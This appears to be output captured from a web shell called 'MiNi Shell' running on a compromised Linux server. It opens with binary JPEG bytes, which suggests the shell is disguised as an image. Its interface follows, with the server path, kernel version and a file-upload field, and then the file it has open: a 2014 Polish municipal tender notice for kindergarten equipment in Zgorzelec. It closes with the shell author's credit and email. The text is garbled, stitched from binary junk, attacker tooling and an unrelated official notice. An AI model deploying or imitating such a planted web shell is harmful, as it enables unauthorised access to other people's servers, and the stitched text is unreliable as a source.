JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140605/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140605/190646-N-2014.html

<p class="kh_header"><b>Zgorzelec: Dostawa i montaż wyposażenia oddziałów przedszkolnych w gminie Zgorzelec w ramach projektu pn. Modernizacja oddziałów przedszkolnych w gminie Zgorzelec</b><br>
<b>Numer ogłoszenia: 190646 - 2014; data zamieszczenia: 05.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Zgorzelec , ul. Kościuszki 70, 59-900 Zgorzelec, woj. dolnośląskie, tel. 75 77 21 400, faks 75 77 56 564.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż wyposażenia oddziałów przedszkolnych w gminie Zgorzelec w ramach projektu pn. Modernizacja oddziałów przedszkolnych w gminie Zgorzelec.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje dostawę wraz z montażem (jeżeli dotyczy) wyposażenia oddziałów przedszkolnych w gminie Zgorzelec w ramach projektu pn. Modernizacja oddziałów przedszkolnych w gminie Zgorzelec. Szczegółowy opis przedmiotu zamówienia został określony w załącznikach nr 7A-7G do niniejszej Specyfikacji istotnych warunków zamówienia: nr 7A - zestawienie wyposażenia oddziału przedszkolnego przy Szkole Podstawowej w Trójcy, nr 7B - zestawienie wyposażenia oddziału przedszkolnego przy Szkole Podstawowej w Łagowie, nr 7C - zestawienie wyposażenia oddziału przedszkolnego przy Szkole Podstawowej w Żarskiej Wsi, nr 7D - zestawienie wyposażenia oddziału przedszkolnego A przy Szkole Podstawowej w Osieku Łużyckim, nr 7E - zestawienie wyposażenia oddziału przedszkolnego B przy Szkole Podstawowej w Osieku Łużyckim. 2. Specyfikacja dla potrzeb opisania przedmiotu zamówienia i w celach poglądowych może wskazywać dla niektórych materiałów, urządzeń itp. znaki towarowe, normy, nazwy producentów lub pochodzenie co jednak nie przesądza o obowiązku ich stosowania przez Wykonawcę. Zamawiający stwierdza, iż dopuszcza możliwość składania ofert równoważnych, tj. zastosowanie innych materiałów i urządzeń niż podane w dokumentacji projektowej, pod warunkiem zapewnienia parametrów nie gorszych niż określone w SIWZ, a także zachowania technologii wykonania, tzn. w wyniku zmiany materiału nie może dojść do zmiany technologii wykonania. Wykonawca, który zastosował materiały i urządzenia równoważne, ma obowiązek wskazać w swojej ofercie jakie materiały i urządzenia zostały zmienione i określić jakie materiały i urządzenia w ich miejsca proponuje oraz wskazać równoważność z materiałami zastosowanymi w dokumentacji. 3. Dodatkowe uwagi: 3.1. Dostarczony przedmiot zamówienia winien być fabrycznie nowy, wolny od wad, wykonany w ramach bezpiecznych technologii oraz dopuszczony do stosowania w placówkach oświatowych - przedszkole. 3.2. Dostarczone wyposażenie winno spełniać wymagania norm UE. Produkty, które tego wymagają winny posiadać niezbędne aktualne certyfikaty bezpieczeństwa, atesty, świadectwa jakości i spełniać wszelkie wymogi norm określonych obowiązującym prawem. 3.3. Wykonawca dostarczony towar ustawi i zamontuje (jeżeli wymagane) w miejscu wskazanym przez Zamawiającego. 3.4. W przypadku wyposażenia i sprzętu wymagającego montażu, złożenia, podłączenia lub instalacji, Wykonawca zobowiązany jest dokonać montażu, podłączenia lub instalacji dostarczonego wyposażenia we wskazanym miejscu, przy czym datą odbioru będzie przekazanie kompletnego złożonego lub zamontowanego wyposażenia i sprzętu. 3.5. Wykonawca zobowiązany jest uzyskać pisemne zatwierdzenie produktów, kształtów produktów oraz kolorów przez Zamawiającego przed dostawą. 3.6. Przedmiot zamówienia objęty będzie 24 miesięcznym okresem gwarancji, licząc od dnia przekazania całości zamówienia protokołem końcowym odbioru. W przypadku, gdy producent dostarczanych elementów nie gwarantuje okresu 24 miesięcy gwarancji, wówczas Wykonawca osobiście wydłuża okres gwarancji i w przypadku uszkodzenia elementów wyposażenia nie z winy Zamawiającego wykona naprawę na swój koszt. W przypadku udzielenia przez producenta gwarancji dłuższej niż wymagana przez Zamawiającego wówczas przyjmuje się gwarancję udzieloną przez producenta. 3.7. Przed przystąpieniem do realizacji zamówienia Wykonawca winien dokonać pomiarów z natury pomieszczeń i dokonać ewentualnej weryfikacji ustawienia oraz wymiarów. 3.8. W związku z obowiązującymi zasadami realizacji projektów z zakresu modernizacji oddziałów przedszkolnych złożona oferta winna być zgodna z publikacją z dnia 3 lipca 2013 r. Ministerstwa Rozwoju Regionalnego pt. Zasady przygotowania, realizacji i rozliczania projektów systemowych w ramach Poddziałania 9.1.1 PO KL w zakresie rzygotowania oddziałów przedszkolnych w szkołach podstawowych do świadczenia wysokiej jakości usług na rzecz dzieci w wieku przedszkolnym, w szczególności z Załącznikiem nr 4 - Katalog wydatków kwalifikowalnych. Oferty, które będą zawierały wydatki przekraczające kategorie określone w w/w dokumencie podlegają wykluczeniu.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielanie zamówień uzupełniających, stanowiących nie więcej niż 20% wartości zamówienia podstawowego, o których mowa w art. 67 ust. 1 pkt 7) Pzp</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.16.10.00-8, 31.71.00.00-6, 39.14.10.00-2, 44.41.00.00-7, 39.16.21.00-6, 30.19.00.00-7, 37.52.41.00-8, 22.10.00.00-1, 48.19.00.00-6, 37.40.00.00-2, 37.52.00.00-9, 37.30.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość wadium ustala się w kwocie 4.000,00 złotych (słownie: cztery tysiące złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania powyższego warunku udziału w postępowaniu na podstawie informacji zawartych w złożonym przez Wykonawcę w ofercie Oświadczeniu o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 11.1.1. SIWZ, w oparciu o zasadę /spełnia - nie spełnia/</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie a w przypadku świadczeń okresowych lub ciągłych również wykonywanych - co najmniej: 2 dostawy tożsame z przedmiotem zamówienia o wartości nie mniejszej niż 100.000,00 zł brutto każda. Zamawiający dokona oceny spełniania powyższego warunku udziału w postępowaniu na podstawie informacji zawartej w załączniku do oferty, o którym mowa w pkt. 11.1.2., w oparciu o zasadę /spełnia - nie spełnia/</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania powyższego warunku udziału w postępowaniu na podstawie informacji zawartych w złożonym przez Wykonawcę w ofercie Oświadczeniu o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 11.1.1 SIWZ, w oparciu o zasadę /spełnia - nie spełnia/</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania powyższego warunku udziału w postępowaniu na podstawie informacji zawartych w złożonym przez Wykonawcę w ofercie Oświadczeniu o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 11.1.1 SIWZ, w oparciu o zasadę /spełnia - nie spełnia/</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania powyższego warunku udziału w postępowaniu na podstawie informacji zawartych w złożonym przez Wykonawcę w ofercie Oświadczeniu o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 11.1.1 SIWZ, w oparciu o zasadę /spełnia - nie spełnia/</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz Oferty, sporządzony na podstawie wzoru stanowiącego załącznik nr 1 do niniejszej SIWZ, 2. stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika z właściwego rejestru albo wpisu do ewidencji działalności gospodarczej, 3. w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego, 4. Kserokopia dokumentu potwierdzającego wniesienie wadium, 5. W przypadku Wykonawców, którzy dysponują zasobem osób trzecich, pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - Wzór zobowiązania stanowi załącznik nr 5 do niniejszej SIWZ. 6. Wypełnione zestawienia wyposażenia od 7A-7E objętego zamówieniem wg wzorów stanowiących załącznik nr 8 do niniejszej SIWZ - formularze cenowe</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Możliwość wprowadzenia zmian umowy przy zachowaniu ceny umowy, może wystąpić w następujących przypadkach:1. w przypadku zmian organizacyjnych stron np.: zmiana reprezentacji, adresu siedziby Firmy, itp.;2. w zakresie rodzaju/modelu konkretnego elementu wyposażenia, w przypadku obiektywnej niemożności dostarczenia danej pomocy, w szczególności: zakończenia produkcji, niedostępności na rynku. Umowę można zmienić co do rodzaju/typu/modelu konkretnego elementu wyposażenia pod warunkiem, że zaoferowane elementy wyposażenia będą nowszą wersją lub będą miały lepsze wszystkie parametry, bądź część parametrów i pozostałe parametry bez zmian, z jednoczesnym zachowaniem wymagań określonych przez Zamawiającego. 3. w zakresie częściowych terminów i terminu końcowego z powodu okoliczności siły wyższej np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewiedzieć z pewnością w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach, z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron. 4. Zmiany podwykonawcy i/lub części wykonywanego przez niego zakresu robót, bądź wprowadzenia nowego podwykonawcy;5. W zakresie płatności: zmianie mogą ulec podziały płatności częściowych (bez wpływu na cenę całościową) jeśli ich wprowadzenie będzie korzystne dla realizacji zamówienia i zaakceptowane przez obie strony Umowy. w zakresie zmiany sposobu rozliczania umowy lub dokonywania płatności.6. Zamawiający przewiduje możliwość zmiany umowy, w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.big.gmina.zgorzelec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Zgorzelec ul. Kościuszki 70, 59-900 Zgorzelec (pok. nr 9).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.06.2014 godzina 10:00, miejsce: Urząd Gminy Zgorzelec ul. Kościuszki 70, 59-900 Zgorzelec (Biuro Obsługi Klienta).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany jest ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com